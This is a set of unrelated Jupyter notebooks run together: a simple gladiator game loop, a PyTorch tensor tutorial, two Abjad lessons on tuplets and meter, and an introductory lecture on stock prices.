# Statistics
plays_max = 10
plays_count = 0
players_dead = 0
players_survived = 0
while plays_count < plays_max:
gladiator = place_gladiator()
# print(gladiator)
print("The Gladiator is ready!")
player = place_player()
# print(player)
print("The player is ready at position %s x %s!" % (player["X"], player["Y"]))
distance_to_glad = dist_glad_to_player(gladiator["X"], player["X"], gladiator["Y"], player["Y"])
input("Fight!")
if distance_to_glad > ATTACK_RANGE:
print("The player has survived!")
players_survived += 1
elif distance_to_glad <= ATTACK_RANGE and gladiator["Attack"] == True:
print("The Gladiator has eliminated the opponent!")
players_dead += 1
elif distance_to_glad <= ATTACK_RANGE and gladiator["Attack"] == False:
print("The Gladiator was killed!")
gladiator_dead = 1
players_survived += 1
plays_count += 1
break
plays_count += 1
input("")
print("The battle in the Coliseum has ended!")
print("Victims: %s" % players_dead)
print("Survivors: %s" % players_survived)
print("Attempts to kill the Gladiator: %s" % plays_count)
###Output
_____no_output_____ |
PyTorch Tensor Notebook.ipynb | ###Markdown
PyTorch Tensor Notebook The Data Spartan Helpful Resources: 1. https://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html#sphx-glr-beginner-blitz-tensor-tutorial-py 2. https://pytorch.org/docs/stable/tensors.html Tensors are similar to NumPy's ndarrays, with the addition being that Tensors can also be used on a GPU to accelerate computing.
###Code
from __future__ import print_function
import torch
###Output
_____no_output_____
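The GPU acceleration mentioned above is not exercised anywhere in this notebook; a minimal sketch (it falls back to CPU when no CUDA device is available):
```python
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
x = torch.ones(3, 3, device=device)   # created directly on the device
y = torch.rand(3, 3).to(device)       # or moved after creation
z = x + y                             # the addition runs on the GPU when available
```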
###Markdown
Tensor Initialization An Uninitialized 5 X 4 Tensor
###Code
x = torch.empty(5, 4)
print(x)
###Output
tensor([[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.]])
###Markdown
A Randomly Initialized 5 x 4 Tensor
###Code
x = torch.rand(5, 4)
print(x)
###Output
tensor([[0.3535, 0.4391, 0.5321, 0.1974],
[0.8540, 0.1070, 0.4687, 0.5473],
[0.4851, 0.2560, 0.0404, 0.9112],
[0.1850, 0.6871, 0.4745, 0.4137],
[0.4271, 0.6072, 0.7693, 0.6042]])
###Markdown
A 5 x 4 Tensor filled zeros and of dtype long
###Code
x = torch.zeros(5, 4, dtype=torch.long)
print(x)
###Output
tensor([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]])
###Markdown
A 1 x 3 Tensor with Data Fed directly into it
###Code
x = torch.tensor([5, 3, 4])
print(x)
###Output
tensor([5, 3, 4])
###Markdown
A 2 x 3 Tensor with Data Directly Fed into it
###Code
x = torch.tensor([[6, 5, 4], [3, 2, 1]])
print(x)
###Output
tensor([[6, 5, 4],
[3, 2, 1]])
###Markdown
A 5 x 4 Tensor with ones using new_one methods and passing the dimension and type as parameters
###Code
x = x.new_ones(5, 4, dtype=torch.double)
print(x)
###Output
tensor([[1., 1., 1., 1.],
[1., 1., 1., 1.],
[1., 1., 1., 1.],
[1., 1., 1., 1.],
[1., 1., 1., 1.]], dtype=torch.float64)
###Markdown
A 1 x 4 Tensor of ones using the new_ones method, passing the dimensions and dtype as parameters
###Code
x = x.new_ones(1, 4, dtype=torch.double)
print(x)
###Output
tensor([[1., 1., 1., 1.]], dtype=torch.float64)
###Markdown
A 5 x 4 Tensor of zeros using the new_zeros method, passing the dimensions and dtype as parameters
###Code
x = x.new_zeros(5, 4, dtype=torch.double)
print(x)
###Output
tensor([[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.]], dtype=torch.float64)
###Markdown
A 1 x 4 Tensor of zeros using the new_zeros method, passing the dimensions and dtype as parameters
###Code
x = x.new_zeros(1, 4, dtype=torch.double)
print(x)
###Output
tensor([[0., 0., 0., 0.]], dtype=torch.float64)
###Markdown
Setting Dtype to Float
###Code
x = torch.randn_like(x, dtype=torch.float)
print(x)
###Output
tensor([[ 0.4822, 0.9900, -1.4706, 0.1237]])
###Markdown
Printing the Size of a Tensor
###Code
print(x.size())
###Output
torch.Size([1, 4])
###Markdown
Operations with Tensors Transpose
###Code
x.t()
# Transpose (via permute)
x.permute(-1,0)
###Output
_____no_output_____
###Markdown
Slicing
###Code
x = torch.Tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
print(x)
# Print the last column
print(x[:, -1])
# First 2 rows
print(x[:2, :])
# Lower right corner
print(x[-1:, -1:])
###Output
tensor([[9.]])
###Markdown
Addition
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
y = torch.tensor([[2, 2, 2], [3, 3, 3], [4, 4, 4]])
z = x + y
print(z)
###Output
tensor([[ 3, 4, 5],
[ 7, 8, 9],
[11, 12, 13]])
###Markdown
Subtraction
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
y = torch.tensor([[2, 2, 2], [3, 3, 3], [4, 4, 4]])
z = x - y
print(z)
###Output
tensor([[-1, 0, 1],
[ 1, 2, 3],
[ 3, 4, 5]])
###Markdown
Multiplication
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
y = torch.tensor([[2, 2, 2], [3, 3, 3], [4, 4, 4]])
z = x * y
print(z)
###Output
tensor([[ 2,  4,  6],
        [12, 15, 18],
        [28, 32, 36]])
###Markdown
Scalar Addition
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x + 1
print(z)
###Output
tensor([[ 2, 3, 4],
[ 5, 6, 7],
[ 8, 9, 10]])
###Markdown
Scalar Subtraction
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x - 1
print(z)
###Output
tensor([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
###Markdown
Scalar Multiplication
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x * 2
print(z)
###Output
tensor([[ 2,  4,  6],
        [ 8, 10, 12],
        [14, 16, 18]])
###Markdown
Scalar Divion
###Code
x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
z = x / 2  # on an integer tensor, older PyTorch floors this; recent versions return floats (use x // 2 for floor division)
print(z)
###Output
tensor([[0, 1, 1],
[2, 2, 3],
[3, 4, 4]])
###Markdown
Alternate Method for Addition
###Code
print(torch.add(x, y))
###Output
tensor([[ 3, 4, 5],
[ 7, 8, 9],
[11, 12, 13]])
###Markdown
Adding In place i.e the tensor itself is modified Adding x to yNote : Any operation that mutates a tensor in-place is post-fixed with an _. For example: x.copy_(y), x.t_(), will change x.
###Code
y.add_(x)
print(y)
###Output
tensor([[ 3, 4, 5],
[ 7, 8, 9],
[11, 12, 13]])
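A quick sketch of the other two in-place operations named above, `copy_` and `t_`:
```python
a = torch.zeros(2, 3)
b = torch.ones(2, 3)
a.copy_(b)       # copies b's values into a, in place
a.t_()           # transposes a in place; a is now 3 x 2
print(a.size())  # torch.Size([3, 2])
```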
###Markdown
NumPy Array-like indexing
###Code
print(x[:, 1])
###Output
tensor([2, 5, 8])
###Markdown
Resizing If you want to resize/reshape tensor, you can use torch.view:
###Code
x = torch.randn(4, 4)
y = x.view(16)
z = x.view(-1, 8) # the size -1 is inferred from other dimensions
print(x.size(), y.size(), z.size())
###Output
torch.Size([4, 4]) torch.Size([16]) torch.Size([2, 8])
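`view` requires a memory layout compatible with the new shape; `reshape` returns a view when it can and falls back to copying otherwise — a small sketch:
```python
t = torch.randn(4, 4).t()              # transposed, hence non-contiguous
# t.view(16)                           # would raise a RuntimeError
print(t.reshape(16).size())            # works: falls back to a copy
print(t.contiguous().view(16).size())  # the manual equivalent
```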
###Markdown
Accessing the Element-wise Value of a TensorIf you have one element tensor, use .item() to get the value as a Python number. For multiple elements, use a loop.
###Code
x = torch.randn(1)
print(x)
print(x.item())
x = torch.rand(5)
print(x)
for item in x:
print(item.item())
###Output
tensor([0.5220, 0.7616, 0.5711, 0.9260, 0.4563])
0.5220347046852112
0.7616415023803711
0.5711096525192261
0.9259992837905884
0.4563405513763428
###Markdown
Converting a Torch Tensor to a NumPy Array
###Code
a = torch.ones(5)
print(a)
b = a.numpy()
print(b)
# Notice how modifying the Tensor a will affect the Numpy Array b
a.add_(1)
print(a)
print(b)
###Output
tensor([2., 2., 2., 2., 2.])
[ 2. 2. 2. 2. 2.]
###Markdown
Converting NumPy Array to Torch Tensor
###Code
import numpy as np
a = np.ones(5)
b = torch.from_numpy(a)
print(a)
print(b)
np.add(a, 1, out=a)
print(a)
print(b)
a = np.random.rand(4,3)
a
b = torch.from_numpy(a)
b
b.numpy()
# Multiply PyTorch Tensor by 5, in place
b.mul_(5)
# Numpy array matches new values from Tensor
a
###Output
_____no_output_____ |
day-2/1-rhythms.ipynb | ###Markdown
A Bottom-up Approach to Complex Rhythms
###Code
%load_ext abjadext.ipython
import abjad
import random
durations = []
numerators = range(16)
denominators = [2**x for x in range(1, 5)]
for x in range(10):
numerator = random.choice(numerators)
denominator = random.choice(denominators)
duration_token = (numerator, denominator)
duration = abjad.Duration(duration_token)
durations.append(duration)
for d in durations:
print(d)
###Output
5/2
1/2
7/8
3/4
5/2
1/2
0
9/16
15/4
3/8
###Markdown
Assignability is a thing:
###Code
duration = abjad.Duration(5, 4)
note = abjad.Note(0, duration)  # raises an exception: a 5/4 duration is not assignable to a single notehead
###Output
_____no_output_____
###Markdown
The `LeafMaker` class helps us around the assignability error:
###Code
maker = abjad.LeafMaker()
pitches = [None]
durations = [abjad.Duration(3, 8), abjad.Duration(5, 8)]
leaves = maker(pitches, durations)
leaves
###Output
_____no_output_____
###Markdown
Tuplets Use the `Tuplet` class to make tuplets (of any non-binary division). The Tuplet class provides an interface for working with complex rhythms in a bottom-up way:
###Code
tuplet = abjad.Tuplet(abjad.Multiplier(2, 3), "c'8 d'8 e'8")
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
You can also pack existing leaves into a Tuplet instance.
###Code
leaves = [abjad.Note("fs'8"), abjad.Note("g'8"), abjad.Rest('r8')]
tuplet = abjad.Tuplet(abjad.Multiplier(2, 3), leaves)
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Tuplet instances all have a multiplier and components.
###Code
tuplet
###Output
_____no_output_____
###Markdown
Understanding Augmentation and Diminution Remember that any tuplet can be represented as an augmentation or a diminution relative to the written notes' default values. Our example tuplet's multiplier of (2,3) for three eighth notes means that each written eighth note lasts for 2/3rds its written value. Because the original durations have been reduced, this is a diminution:
###Code
tuplet.diminution()
###Output
_____no_output_____
###Markdown
A tuplet with a multiplier greater than 1, on the other hand, would be an augmentation:
###Code
tuplet = abjad.Tuplet((4,3), "fs'16 g'16 r16")
tuplet.diminution()
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
This last tuplet is an augmentation in which each of the written sixteenth notes lasts for 4/3rds of its written duration. The sounding result would be identical, and these are just two ways of writing the same thing, the former of which happens to be conventional. Remember that object-oriented programming gives us objects with characteristics and behaviors. We can use the dot-chaining syntax to read and write the tuplet's multiplier attribute:
###Code
tuplet = abjad.Tuplet(abjad.Multiplier(2, 3), "fs'8 g' r8")
tuplet.multiplier
tuplet.multiplier = abjad.Multiplier(4, 5)
tuplet
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Adding Leaves The multiplier is a reasonable characteristic for our tuplet to have, but what about behaviors? Well, you probably want to be able to build up tuplets by adding leaves to them, one or several a time. The append method adds leaves to the end of a tuplet (and to any Python list), one leaf at a time:
###Code
tuplet.append(abjad.Note("e'4."))
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
...or using a LilyPond string:
###Code
tuplet.append("bf8")
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Likewise, the extend method adds two or more leaves at a time:
###Code
notes = [abjad.Note("fs'32"), abjad.Note("e'32"), abjad.Note("d'32"), abjad.Rest((1, 32))]
tuplet.extend(notes)
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
And you can use a LilyPond string with extend, too:
###Code
tuplet.extend("gs'8 a8")
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Removing Leaves You can remove tuplet components by reference using the remove method:
###Code
tuplet.remove(tuplet[3])
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
If you want to remove a component by index and then keep it to do something else with it, use the pop method instead of remove:
###Code
popped = tuplet.pop(2)
popped
abjad.show(tuplet)
###Output
_____no_output_____
###Markdown
Indexing Leaves Tuplets support indexing, if you'd like to do something to the nth component of a tuplet:
###Code
tuplet[1]
###Output
_____no_output_____
###Markdown
If you've added an existing list to a tuplet's components, and you'd like to see where a component of that list is in the tuplet, you can use the tuplet's index method - in our case, we'll use our notes list from above:
###Code
notes
notes[1]
tuplet.index(notes[1]) # Where is the second element of notes in tuplet?
abjad.show(tuplet) # it's at index 4
###Output
_____no_output_____
###Markdown
Making Tuplets from Durations and Ratios The Tuplet class also provides a method for constructing a tuplet from a duration and a ratio, where the ratio is a list of integers, the sum of which determines the number of equally spaced pulses within the duration:
###Code
tuplet = abjad.Tuplet.from_duration_and_ratio((1,4), [1,3,1])
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
This might not seem like much, but we can write functions that use these kinds of basic functionalities to do more complicated things, like we'll do in this next example, taken from a real score: Brian Ferneyhough - Unsichtbare Farben Mikhail Malt analyzes the rhythmic materials of Ferneyhough’s solo violin composition, Unsichtbare Farben, in The OM Composer’s Book 2. Malt explains that Ferneyhough used OpenMusic to create an “exhaustive catalogue of rhythmic cells” such that: Each cell consists of the same duration divided into two pulses related by a durational proportion ranging from 1:1 to 1:11. The second pulse is then subdivided successively into 1, 2, 3, 4, 5 and 6 equal parts. Let’s recreate Malt’s results in Abjad. The Proportions We use a list comprehension to describe a list of (1,n) tuples, each of which will describe the durational proportion between a cell's first and second pulse:
###Code
proportions = [(1, n) for n in range(1, 11 + 1)]
proportions
###Output
_____no_output_____
###Markdown
The Transforms Next we’ll show how to divide a quarter note into various ratios, and then divide the final logical tie of the resulting tuplet into yet another ratio:
###Code
def make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
):
r'''Makes nested tuplet.
'''
outer_tuplet = abjad.Tuplet.from_duration_and_ratio(
tuplet_duration, outer_tuplet_proportions)
inner_tuplet_proportions = inner_tuplet_subdivision_count * [1]
last_leaf = next(abjad.iterate(outer_tuplet).leaves(reverse=True))
right_logical_tie = abjad.inspect(last_leaf).logical_tie()
right_logical_tie.to_tuplet(inner_tuplet_proportions)
return outer_tuplet
###Output
_____no_output_____
###Markdown
And of course it's easier to see what this function does with an example of use:
###Code
tuplet = make_nested_tuplet(abjad.Duration(1, 4), (1, 1), 5)
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
We see that a duration of a quarter note (the first argument) has been divided into two pulses with a durational proportion of 1:1 (second argument), the second pulse of which has then been divided into five equally spaced parts (the third argument). Try changing the arguments and see what happens.
###Code
tuplet = make_nested_tuplet(abjad.Duration(1, 4), (13, 28), 11)
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
tuplet = make_nested_tuplet(abjad.Duration(1, 4), (3, 1), 5)
staff = abjad.Staff([tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
Logical Ties Solve the Problem of Five A logical tie is a selection of notes or chords connected by ties. It lets us talk about a notated rhythm of 5/16, for example, which cannot be expressed with only a single leaf. Note how we can divide a tuplet whose outer proportions are 3/5, where the second logical tie requires two notes to express the 5/16 duration:
###Code
outer_tuplet = abjad.Tuplet.from_duration_and_ratio(abjad.Duration(1, 4), (3, 5))
staff = abjad.Staff([outer_tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
subdivided_tuplet = make_nested_tuplet(abjad.Duration(1, 4), (3, 5), 3)
staff = abjad.Staff([subdivided_tuplet], lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
Do you see which objects and methods in our make_nested_tuplet function convert a logical tie into a tuplet? The Rhythms Now that we know how to make the basic building block, let’s make a lot of tuplets all at once. We’ll set the duration of each tuplet equal to a quarter note:
###Code
duration = abjad.Fraction(1,4)
###Output
_____no_output_____
###Markdown
Reusing our make_nested_tuplet function, we make one row of rhythms, with the last logical tie increasingly subdivided:
###Code
def make_row_of_nested_tuplets(
tuplet_duration,
outer_tuplet_proportions,
column_count,
):
r'''Makes row of nested tuplets.
'''
assert 0 < column_count
row_of_nested_tuplets = []
for n in range(column_count):
inner_tuplet_subdivision_count = n + 1
nested_tuplet = make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
)
row_of_nested_tuplets.append(nested_tuplet)
return row_of_nested_tuplets
tuplets = make_row_of_nested_tuplets(duration, (2, 1), 6)
staff = abjad.Staff(tuplets, lilypond_type='RhythmicStaff')
abjad.show(staff)
###Output
_____no_output_____
###Markdown
If we can make one single row of rhythms, we can make many rows of rhythms. We reuse this last function to make another function:
###Code
def make_rows_of_nested_tuplets(tuplet_duration, row_count, column_count):
r'''Makes rows of nested tuplets.
'''
assert 0 < row_count
rows_of_nested_tuplets = []
for n in range(row_count):
outer_tuplet_proportions = (1, n + 1)
row_of_nested_tuplets = make_row_of_nested_tuplets(
tuplet_duration, outer_tuplet_proportions, column_count)
rows_of_nested_tuplets.append(row_of_nested_tuplets)
return rows_of_nested_tuplets
score = abjad.Score()
for tuplet_row in make_rows_of_nested_tuplets(duration, 10, 6):
score.append(abjad.Staff(tuplet_row, lilypond_type='RhythmicStaff'))
abjad.show(score)
###Output
_____no_output_____
###Markdown
This example illustrates how simple bottom-up rhythmic constructions can be abstracted to explore the potential of a rhythmic idea. Meter
###Markdown
Chopping Durations with Durations It's easy to make durations that don't neatly fit into a particular time signature:
###Code
staff = abjad.Staff("c'4. c'4. c'4. c'4. c'4. c'4. c'4. c'4.")
abjad.f(staff)
###Output
\new Staff
{
c'4.
c'4.
c'4.
c'4.
c'4.
c'4.
c'4.
c'4.
}
###Markdown
Let's make this metrically legible by chopping the leaves every whole note using `mutate().split()`. Note that this function returns selections full of the kind of component you split: if you want to split leaves in place, pass in `staff[:]`, and if you want to return `Selection`s containing new `Staff`s, pass in `staff`.To keep splitting by the same duration until we get through all of the leaves, set the keyword argument cyclic equal to `True`.
###Code
abjad.mutate(staff[:]).split([abjad.Duration(4,4)], cyclic=True)
abjad.f(staff)
###Output
\new Staff
{
c'4.
c'4.
c'4
~
c'8
c'4.
c'4.
c'8
~
c'4
c'4.
c'4.
}
###Markdown
This is better -- the music now plays nicely with LilyPond's barlines and is no longer incorrectly notated -- but in Python, we still don't have any `Measure` objects, and our staff still iterates through leaves:
###Code
for leaf in staff[:5]:
print(leaf)
###Output
c'4.
c'4.
c'4
c'8
c'4.
###Markdown
What should we do if we want to iterate through our music measure by measure? Wrapping Leaves in Measures We can group the music into measures by wrapping each split `Selection` in a `Container`:
###Code
duration = abjad.Duration(4,4)
for shard in abjad.mutate(staff[:]).split([duration], cyclic=True):
abjad.mutate(shard).wrap(abjad.Container())
abjad.f(staff)
abjad.show(staff)
###Output
\new Staff
{
{
c'4.
c'4.
c'4
~
}
{
c'8
c'4.
c'4.
c'8
~
}
{
c'4
c'4.
c'4.
}
}
###Markdown
Now we have measures in our score tree, and our staff will iterate through measures by default.
###Code
for measure in staff:
print(measure)
###Output
Container("c'4. c'4. c'4 ~")
Container("c'8 c'4. c'4. c'8 ~")
Container("c'4 c'4. c'4.")
###Markdown
If we want to iterate by leaves, now we need to use `abjad.iterate()`.
###Code
for leaf in abjad.iterate(staff).leaves():
print(leaf)
###Output
c'4.
c'4.
c'4
c'8
c'4.
c'4.
c'8
c'4
c'4.
c'4.
###Markdown
Rewriting Rhythms with Metric Hierarchies This is looking better, but the internal rhythms of our music still fail to comport with conventions of notation that dictate that we should always show beat three in a measure of (4,4). To do this, we need to impose a hierarchical model of meter onto our music, measure by measure.
###Code
four = abjad.Meter()
for measure in staff:
abjad.mutate(measure).rewrite_meter(four)
abjad.f(staff)
###Output
\new Staff
{
{
c'4.
c'4.
c'4
~
}
{
c'8
c'4.
c'4.
c'8
~
}
{
c'4
c'4.
c'4.
}
}
###Markdown
This didn't change anything, because Abjad's default (4,4) hierarchy is just four quarter notes:
###Code
abjad.graph(four)
###Output
_____no_output_____
###Markdown
We need to define a custom meter that includes another level of metric hierarchy and rewrite according to that. To do this, we'll use IRCAM's rhythm tree syntax:
###Code
other_four = abjad.Meter('(4/4 ((2/4 (1/4 1/4)) (2/4 (1/4 1/4)) ))')
for measure in staff:
abjad.mutate(measure).rewrite_meter(other_four)
abjad.f(staff)
###Output
\new Staff
{
{
c'4.
c'8
~
c'4
c'4
~
}
{
c'8
c'4.
c'4.
c'8
~
}
{
c'4
c'4
~
c'8
c'4.
}
}
###Markdown
This works, because our new meter contains a second level of metric hierarchy.
###Code
abjad.graph(other_four)
###Output
_____no_output_____
###Markdown
A Bottom-up Approach to Complex Rhythms
###Code
from abjad import *
###Output
_____no_output_____
###Markdown
Tuplets The Tuplet class provides an interface for working with complex rhythms in a bottom-up way.
###Code
tuplet = Tuplet(Multiplier(2, 3), "c'8 d'8 e'8")
show(tuplet)
###Output
_____no_output_____
###Markdown
You can also pack existing leaves into a Tuplet instance.
###Code
leaves = [Note("fs'8"), Note("g'8"), Rest('r8')]
tuplet = Tuplet(Multiplier(2, 3), leaves)
show(tuplet)
###Output
_____no_output_____
###Markdown
Tuplet instances all have a multiplier and components.
###Code
tuplet
###Output
_____no_output_____
###Markdown
Understanding Augmentation and Diminution Remember that any tuplet can be represented as an augmentation or a diminution relative to the written notes' default values. Our example tuplet's multiplier of (2,3) for three eighth notes means that each written eighth note lasts for 2/3rds its written value. Because the original durations have been reduced, this is a diminution:
###Code
tuplet.is_diminution
###Output
_____no_output_____
###Markdown
A tuplet with a multiplier greater than 1, on the other hand, would be an augmentation:
###Code
tuplet = Tuplet((4,3), "fs'16 g'16 r16")
show(tuplet)
###Output
_____no_output_____
###Markdown
This last tuplet is an augmentation in which each of the written sixteenth notes lasts for 4/3rds of its written duration. The sounding result would be identical, and these are just two ways of writing the same thing, the former of which happens to be conventional. Remember that object-oriented programming gives us objects with characteristics and behaviors. We can use the dot-chaining syntax to read and write the tuplet's multiplier attribute:
###Code
tuplet = Tuplet(Multiplier(2, 3), "fs'8 g' r8")
tuplet.multiplier
tuplet.multiplier = Multiplier(4, 5)
tuplet
show(tuplet)
###Output
_____no_output_____
###Markdown
Adding Leaves The multiplier is a reasonable characteristic for our tuplet to have, but what about behaviors? Well, you probably want to be able to build up tuplets by adding leaves to them, one or several at a time. The append method adds leaves to the end of a tuplet (and to any Python list), one leaf at a time:
###Code
tuplet.append(Note("e'4."))
show(tuplet)
###Output
_____no_output_____
###Markdown
...or using a LilyPond string:
###Code
tuplet.append("bf8")
show(tuplet)
###Output
_____no_output_____
###Markdown
Likewise, the extend method adds two or more leaves at a time:
###Code
notes = [Note("fs'32"), Note("e'32"), Note("d'32"), Rest((1, 32))]
tuplet.extend(notes)
show(tuplet)
###Output
_____no_output_____
###Markdown
And you can use a LilyPond string with extend, too:
###Code
tuplet.extend("gs'8 a8")
show(tuplet)
###Output
_____no_output_____
###Markdown
Removing Leaves You can remove tuplet components by reference using the remove method:
###Code
tuplet.remove(tuplet[3])
show(tuplet)
###Output
_____no_output_____
###Markdown
If you want to remove a component by index and then keep it to do something else with it, use the pop method instead of remove:
###Code
popped = tuplet.pop(2)
show(tuplet)
###Output
_____no_output_____
###Markdown
Indexing Leaves Tuplets support indexing, if you'd like to do something to the nth component of a tuplet:
###Code
tuplet[1]
###Output
_____no_output_____
###Markdown
If you've added an existing list to a tuplet's components, and you'd like to see where a component of that list is in the tuplet, you can use the tuplet's index method - in our case, we'll use our notes list from above:
###Code
notes
notes[1]
tuplet.index(notes[1])
###Output
_____no_output_____
###Markdown
The second item in our notes list is the seventh component in our tuplet.
###Code
show(tuplet)
###Output
_____no_output_____
###Markdown
Making Tuplets from Durations and Ratios The Tuplet class also provides a method for constructing a tuplet from a duration and a ratio, where the ratio is a list of integers, the sum of which determines the number of equally spaced pulses within the duration:
###Code
tuplet = Tuplet.from_duration_and_ratio((1,4), [1,3,1])
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
This might not seem like much, but we can write functions that use these kinds of basic functionalities to do more complicated things, like we'll do in this next example, taken from a real score: Brian Ferneyhough - Unsichtbare Farben Mikhail Malt analyzes the rhythmic materials of Ferneyhough’s solo violin composition, Unsichtbare Farben, in The OM Composer’s Book 2. Malt explains that Ferneyhough used OpenMusic to create an “exhaustive catalogue of rhythmic cells” such that: Each cell consists of the same duration divided into two pulses related by a durational proportion ranging from 1:1 to 1:11. The second pulse is then subdivided successively into 1, 2, 3, 4, 5 and 6 equal parts. Let’s recreate Malt’s results in Abjad. The Proportions We use a list comprehension to describe a list of (1,n) tuples, each of which will describe the durational proportion between a cell's first and second pulse:
###Code
proportions = [(1, n) for n in range(1, 11 + 1)]
proportions
###Output
_____no_output_____
###Markdown
The Transforms Next we’ll show how to divide a quarter note into various ratios, and then divide the final logical tie of the resulting tuplet into yet another ratio:
###Code
def make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
):
r'''Makes nested tuplet.
'''
outer_tuplet = Tuplet.from_duration_and_ratio(
tuplet_duration, outer_tuplet_proportions)
inner_tuplet_proportions = inner_tuplet_subdivision_count * [1]
last_leaf = next(iterate(outer_tuplet).by_leaf())
right_logical_tie = inspect_(last_leaf).get_logical_tie()
right_logical_tie.to_tuplet(inner_tuplet_proportions)
return outer_tuplet
###Output
_____no_output_____
###Markdown
And of course it's easier to see what this function does with an example of use:
###Code
tuplet = make_nested_tuplet(Duration(1, 4), (1, 1), 5)
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
We see that a duration of a quarter note (the first argument) has been divided into two pulses with a durational proportion of 1:1 (second argument), the second pulse of which has then been divided into five equally spaced parts (the third argument). Try changing the arguments and see what happens.
###Code
tuplet = make_nested_tuplet(Duration(1, 4), (2, 1), 5)
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
tuplet = make_nested_tuplet(Duration(1, 4), (3, 1), 5)
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
Logical Ties Solve the Problem of Five A logical tie is a selection of notes or chords connected by ties. It lets us talk about a notated rhythm of 5/16, for example, which cannot be expressed with only a single leaf. Note how we can divide a tuplet whose outer proportions are 3/5, where the second logical tie requires two notes to express the 5/16 duration:
###Code
outer_tuplet = Tuplet.from_duration_and_ratio(Duration(1, 4), (3, 5))
staff = scoretools.Staff([outer_tuplet], context_name='RhythmicStaff')
show(staff)
subdivided_tuplet = make_nested_tuplet(Duration(1, 4), (3, 5), 3)
staff = scoretools.Staff([subdivided_tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
Do you see which objects and methods in our make_nested_tuplet function convert a logical tie into a tuplet? The Rhythms Now that we know how to make the basic building block, let’s make a lot of tuplets all at once. We’ll set the duration of each tuplet equal to a quarter note:
###Code
duration = Fraction(1,4)
###Output
_____no_output_____
###Markdown
Reusing our make_nested_tuplet function, we make one row of rhythms, with the last logical tie increasingly subdivided:
###Code
def make_row_of_nested_tuplets(
tuplet_duration,
outer_tuplet_proportions,
column_count,
):
r'''Makes row of nested tuplets.
'''
assert 0 < column_count
row_of_nested_tuplets = []
for n in range(column_count):
inner_tuplet_subdivision_count = n + 1
nested_tuplet = make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
)
row_of_nested_tuplets.append(nested_tuplet)
return row_of_nested_tuplets
tuplets = make_row_of_nested_tuplets(duration, (2, 1), 6)
staff = scoretools.Staff(tuplets, context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
If we can make one single row of rhythms, we can make many rows of rhythms. We reuse this last function to make another function:
###Code
def make_rows_of_nested_tuplets(tuplet_duration, row_count, column_count):
r'''Makes rows of nested tuplets.
'''
assert 0 < row_count
rows_of_nested_tuplets = []
for n in range(row_count):
outer_tuplet_proportions = (1, n + 1)
row_of_nested_tuplets = make_row_of_nested_tuplets(
tuplet_duration, outer_tuplet_proportions, column_count)
rows_of_nested_tuplets.append(row_of_nested_tuplets)
return rows_of_nested_tuplets
score = Score()
for tuplet_row in make_rows_of_nested_tuplets(duration, 4, 6):
score.append(scoretools.Staff(tuplet_row, context_name='RhythmicStaff'))
show(score)
###Output
_____no_output_____ |
lecture/lec10/lec10.ipynb | ###Markdown
Lecture 10 – More Review Data 94, Spring 2021 Stock prices Part 1 **Task:** Given a list of prices of a stock on a single day, return a string describing whether the stock increased, stayed the same, or decreased from its starting price.
###Code
def daily_change(prices):
first = prices[0]
last = prices[-1]
if first > last:
return 'decrease'
elif first == last:
return 'none'
else:
return 'increase'
# Returns 'increase', since 1 < 4
daily_change([1, 2, 2.5, 3, 3.5, 4])
# Returns 'none', since 3 = 3
daily_change([3, 9, 3])
# Returns 'decrease', since 5 > 2
daily_change([5, 4, 3, 4, 5, 4, 3, 2, 2])
###Output
_____no_output_____
###Markdown
